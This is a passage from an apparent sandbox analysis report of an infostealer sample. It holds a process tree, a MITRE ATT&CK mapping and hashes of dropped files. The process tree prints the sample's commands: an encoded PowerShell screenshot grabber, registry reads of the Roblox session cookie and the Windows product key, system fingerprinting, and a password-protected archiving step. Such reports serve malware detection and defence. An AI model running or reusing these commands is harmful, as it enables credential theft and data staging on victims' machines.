    - Suspicious use of WriteProcessMemory
    PID:2144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4320
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3bs1dx1z\3bs1dx1z.cmdline"
        5⤵
        
        PID:3940
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9DE.tmp" "c:\Users\Admin\AppData\Local\Temp\3bs1dx1z\CSC27731D8A4C4F4150BDDA1E263A5A8EF.TMP"
        6⤵
        
        PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3732
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1480
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4428
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2584
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2276
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1684
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI3362\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\xO5lD.zip" *"
    3⤵
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\_MEI3362\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI3362\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\xO5lD.zip" *
      4⤵
      Executes dropped EXE
      PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
b33899a3ad59378f79cae6c051d9774c

SHA1
96d15df9804383a3aa0d6078be7ab133ffef08cf

SHA256
db0352f72e8ab92f4bd63276cfdb52381d2b58c2e1cc2ba99dd544ea41e12f6b

SHA512
7126bd179154ede17d2e95c79222196bdd9d8ac5f3db1c1586f0782c1dc7dabbe95f0c08d6730c7b76eca2a65039ef69276a5954e049d5132ab6afcfedc742b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0dfaef21000a15c7962663d49e6cf4f4

SHA1
f6ed5e3cac57735d350acc2b0f21e234aee792c3

SHA256
8f98a10585ff9520ff976419fe1393ff6f64e304d460b30c96fa8f35609a2259

SHA512
18d08f2b0fc63f94714018a422bcf91c88575fd2fed7ed6aa3daca8c51dc7e812feceea2073670c25382975e6a3a069b22da2b63cd8e2c359af906a40e11d29c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
caec9529ed1c14acd7162af2f82db971

SHA1
3e619e0ccd4132b302260d104c2315b9b4923aa7

SHA256
db2e73ab1d6766efde73b81d811c05b8a37b9a560f178158eeae294e8e36f0f2

SHA512
acdde207b26f11379d6436cc5ea6a6845b278aa81e26411fdf8563708742aa206090d4fc8e8f7bbc14aebb23faded0b1e6a32fa4dc63c6f799e3efdd6cd0a4da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
913b650da17aac711af49c347c219263

SHA1
6b8c16c7873e02abba9da07868573f1cd182b0ea

SHA256
99d02cc47a16985980f554055eca2e041d6380784bff9f5a9a37da21bf0f86e6

SHA512
35d4af49c16e27937068340c75bfc04cebad7ec28b80292b0b9841e4c6da87e3ede5c40f7527a1a885c4786ac40b49881ee43e8b53f9fc01474cb658085ca2f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
93724a35276ac66e78bc7da7d223a2e4

SHA1
a90f98f9fe2e74c9ceccd19b5b969ea2ab9f6022

SHA256
975c29241a7dad4c437aa55da3781236d2571d8fa05fa9e92f6ca0e23b7a26e1

SHA512
f0887cd469b3c24d62145e57ddbde9e0a741f2278c256c2eb77dc47235aa4171c4cb60b433bb451358ceab1ee8c876d2406cc5616f40410cb4bb91a5c59ea8c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
50c471d7ad6b31d0b849484cf438c2d3

SHA1
cd72f1f1db5576c0118337e5cfc9cd6ece7b918c

SHA256
a94dc5ecbbe2e0c0f3bf90fb6a7103316e08a679ab9534c06d65263a795e379c

SHA512
d6f597a8375c85bd81534d5e79937c55ff25f7a72defd5dc6d661b2290a09be6b11534fe4e6ace438bb575d7f0f62812f336ba1752a7e53c14f82cbdecd42613

Download Submit
C:\Users\Admin\AppData\Local\Temp\3bs1dx1z\3bs1dx1z.dll

Filesize
4KB

MD5
bfd6b06643022113fb55f7bb7e6ff542

SHA1
ee01822bc306a63723bada5b08c9bd65b2e341ac

SHA256
3610fa85ec054bae9ede6d85b34fe0eaed9a52149638f183ad4532081459fbc8

SHA512
d1c6b8848ee0d7aa3203a7e7f01113d11eccc3878b17f11f457d3dc9edf2354056d6f9550fe5e9126e255e3e199b498eb0eeb838cd701630a76d8ca41ac40cc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9DE.tmp

Filesize
1KB

MD5
9987fe11e20259712769e3303902f1e2

SHA1
b11087792555f0dc2f2d958d626f31efd6059cec

SHA256
8068b915f53d5134879d7cfbafee5b86117ed88cfbf511cc46e50deb202bd943

SHA512
bec24f1f3e4aed9322cd4bc9f70c3eeaabcf8f0178056bd9684e397ea838b528a173a77d30e0d04b2c6b8e365d8fbfd453d57e35499697a76ba7b9a8b820fb0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\_bz2.pyd

Filesize
48KB

MD5
341a6188f375c6702de4f9d0e1de8c08

SHA1
204a508ca6a13eb030ed7953595e9b79b9b9ba3b

SHA256
7039e1f1aef638c8dd8f8a4c55fd337219a4005dca2b557ba040171c27b02a1e

SHA512
5976f053ff865313e3b37b58ca053bc2778df03b8488bb0d47b0e08e1e7ba77ccf731b44335df0cea7428b976768bedc58540e68b54066a48fc4d8042e1d8a24

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\_ctypes.pyd

Filesize
58KB

MD5
ee2d4cd284d6bad4f207195bf5de727f

SHA1
781344a403bbffa0afb080942cd9459d9b05a348

SHA256
2b5fe7c399441ac2125f50106bc92a2d8f5e2668886c6de79452b82595fc4009

SHA512
a6b3ad33f1900132b2b8ff5b638cbe7725666761fc90d7f76fc835ecd31dfefc48d781b12b1e60779191888931bb167330492599c5fea8afa51e9c0f3d6e8e55

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\_decimal.pyd

Filesize
106KB

MD5
918e513c376a52a1046c4d4aee87042d

SHA1
d54edc813f56c17700252f487ef978bde1e7f7e1

SHA256
f9570f5d214d13446ed47811c7674e1d77c955c60b9fc7247ebcb64a32ae6b29

SHA512
ac2990a644920f07e36e4cb7af81aab82a503e579ce02d5026931631388e2091a52c12e4417e8c747f2af9aa9526b441a3f842387b5be534633c2258beeed497

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\_hashlib.pyd

Filesize
35KB

MD5
6d2132108825afd85763fc3b8f612b11

SHA1
af64b9b28b505e4eab1b8dd36f0ecf5511cc78a0

SHA256
aba69b3e817bfb164ffc7549c24b68addb1c9b88a970cf87bec99d856049ee52

SHA512
196bcf97034f1767a521d60423cca9d46a6447156f12f3eac5d1060a7fa26ac120c74c3ef1513e8750090d37531d014a48dd17db27fbfbb9c4768aa3aca6d5c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\_lzma.pyd

Filesize
86KB

MD5
5eee7d45b8d89c291965a153d86592ee

SHA1
93562dcdb10bd93433c7275d991681b299f45660

SHA256
7b5c5221d9db2e275671432f22e4dfca8fe8a07f6374fcfed15d9a3b2fdf07d9

SHA512
0d8f178ff5ef1e87aa4aae41089d063985c11544f85057e3860bcab1235f5ddb1cb582550a482c8b7eb961211fa67777e30b678294258ada27c423070ce8453e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\_queue.pyd

Filesize
25KB

MD5
8b3ba5fb207d27eb3632486b936396a3

SHA1
5ad45b469041d88ec7fd277d84b1e2093ec7f93e

SHA256
9a1e7aaf48e313e55fc4817f1e7f0bfe0a985f30c024dcc8d28d67f8ff87a051

SHA512
18f5a0b1a384e328d07e59a5cefbc25e027adf24f336f5ec923e38064312ea259851167bc6bc0779e2d05cd39ddd8d16a2dfd15751c83ee58fda3b1187edc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\_socket.pyd

Filesize
43KB

MD5
3ea95c5c76ea27ca44b7a55f6cfdcf53

SHA1
aace156795cfb6f418b6a68a254bb4adfc2afc56

SHA256
7367f5046980d3a76a6ddefc866b203cbaced9bb17f40ea834aed60bb5b65923

SHA512
916effbe6130a7b6298e1bd62e1e83e9d3defc6a7454b9044d953761b38808140a764ded97dcb1ab9d0fa7f05ae08c707da7af1c15f672a959ad84aa8da114c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\_sqlite3.pyd

Filesize
56KB

MD5
c9d6ffa3798bb5ae9f1b082d66901350

SHA1
25724fecf4369447e77283ece810def499318086

SHA256
410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec

SHA512
878b10771303cb885039348fc7549338ad2ce609f4df6fff6588b079ab9efb624d6bc31474e806ad2a97785b30877b8241286276f36aab9e50a92cbf11adc448

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\_ssl.pyd

Filesize
65KB

MD5
936919f3509b2a913bf9e05723bc7cd2

SHA1
6bf9f1ecfcd71fc1634b2b70fcd567d220b1a6bd

SHA256
efce6dcf57915f23f10c75f6deaf6cb68efe87426caad4747ca908199b1f01e3

SHA512
2b2436e612b6cd60d794f843498fcbf8624a80e932d242592e569e32ec1d40a25d80e2c7e9f8edc7fc0478cef2ec6f77ad6c6ebbddf5afb027263397c91c73c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\base_library.zip

Filesize
1.4MB

MD5
cb477acaab29ddd14d6cd729f42430aa

SHA1
2499d1f280827f0fee6ac35db2ddf149e9f549b0

SHA256
1ff28205db0021b6a4f354eb6090fc6f714c6581253f1c21ff12de137f40bed4

SHA512
5c977f327403f9c4080a8df8edbab057dfd27b32f29dd305f740e6465be2ade5c1dc91c10b304d210d89c6114f5ae18756e1be619217b460f00342a940e5be2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\blank.aes

Filesize
122KB

MD5
f240aa1d542d4629a744d8427d9076f2

SHA1
dc5fadf625215ba4ea976b8052bf08f8ebaeab53

SHA256
e4f94e4fa7347d626457229e6fdb8fd4d433d797122ca04af9ef07ce5483ecdf

SHA512
52946b870d5d85995e609ed4025daae556a00faf30efceb5f4c10b0a96f569154585ff5449af322338f6676824891b106944dc5d6cfeebcb46b003f8785eb533

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\bound.blank

Filesize
1.3MB

MD5
45115416256916cb9611fe88581975c6

SHA1
7027280f89e681da5877e205367e13549554891d

SHA256
1091749b934e479522fe32541c3ecc10049171c9b975cc8681a923c26afd1bf1

SHA512
18be44e8db06d4b6e3d687a720b346ea31b36bc401a5a646507c2ea21ecc197916a529e1901a0edd696dde94d2636691c5754c6cb7b33b98acb9a91c715c0936

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\libcrypto-3.dll

Filesize
1.6MB

MD5
27515b5bb912701abb4dfad186b1da1f

SHA1
3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411

SHA256
fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a

SHA512
087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\libssl-3.dll

Filesize
223KB

MD5
6eda5a055b164e5e798429dcd94f5b88

SHA1
2c5494379d1efe6b0a101801e09f10a7cb82dbe9

SHA256
377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8

SHA512
74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\python311.dll

Filesize
1.6MB

MD5
76eb1ad615ba6600ce747bf1acde6679

SHA1
d3e1318077217372653be3947635b93df68156a4

SHA256
30be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1

SHA512
2b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\select.pyd

Filesize
25KB

MD5
2398a631bae547d1d33e91335e6d210b

SHA1
f1f10f901da76323d68a4c9b57f5edfd3baf30f5

SHA256
487fd8034efaf55106e9d04fc5d19fcd3e6449f45bc87a4f69189cd4ebb22435

SHA512
6568982977b8adb6ee04b777a976a2ecc3e4db1dffbd20004003a204eb5dae5980231c76c756d59a5309c2b1456cb63ab7671705a2c2e454c667642beb018c21

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\sqlite3.dll

Filesize
630KB

MD5
cc9d1869f9305b5a695fc5e76bd57b72

SHA1
c6a28791035e7e10cfae0ab51e9a5a8328ea55c1

SHA256
31cb4332ed49ce9b31500725bc667c427a5f5a2a304595beca14902ba7b7eeee

SHA512
e6c96c7c7665711608a1ba6563b7b4adb71d0bf23326716e34979166de65bc2d93cb85d0cb76475d55fd042da97df978f1423c099ad5fbeeaef8c3d5e0eb7be1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3362\unicodedata.pyd

Filesize
295KB

MD5
6279c26d085d1b2efd53e9c3e74d0285

SHA1
bd0d274fb9502406b6b9a5756760b78919fa2518

SHA256
411bfb954b38ec4282d10cecb5115e29bffb0b0204ffe471a4b80777144b00f6

SHA512
30fdeed6380641fbb4d951d290a562c76dd44b59194e86f550a4a819f46a0deb7c7a2d94867cc367c41dcab9efb95628d65fe9a039c0e14a679c149148d82ac9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qi3qtbxz.0xy.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\bound.exe

Filesize
1.5MB

MD5
5e84b421a55b22e687368d249d82df6d

SHA1
f1e8e727bda81623ded8b870185788faa1a5ebbf

SHA256
84f3dd6dd9eea7df92884414c8b16a2df7734210364366a0c9728b048d511501

SHA512
a23c4822d2a122525efc37248f2e4c9769da6f99b1ab5b08bbaedf15f852d1be70547a21668d3a649d6cca3dc5780012bd57d6f148dd0f8544d22a38629e3c1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Desktop\EnterResize.jpeg

Filesize
540KB

MD5
31b4420c62655c1707a974932885213f

SHA1
0429b7f9825fbc8623118673565832c04d86e8f5

SHA256
3ea86f28b56b73f7e88b6ae79d53703c441346787b7334e7d8a690163b9c4aba

SHA512
4ff56bd88e2fa4887d3bd983db885a481a0a2dc282a0b224d1942a9ff814c5e20356ffd7386e39de5d87d8105b50d37cb28b97d9fd91aa28d340cb60ffa66873

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏ ‏‌\Common Files\Desktop\GrantReceive.mp4

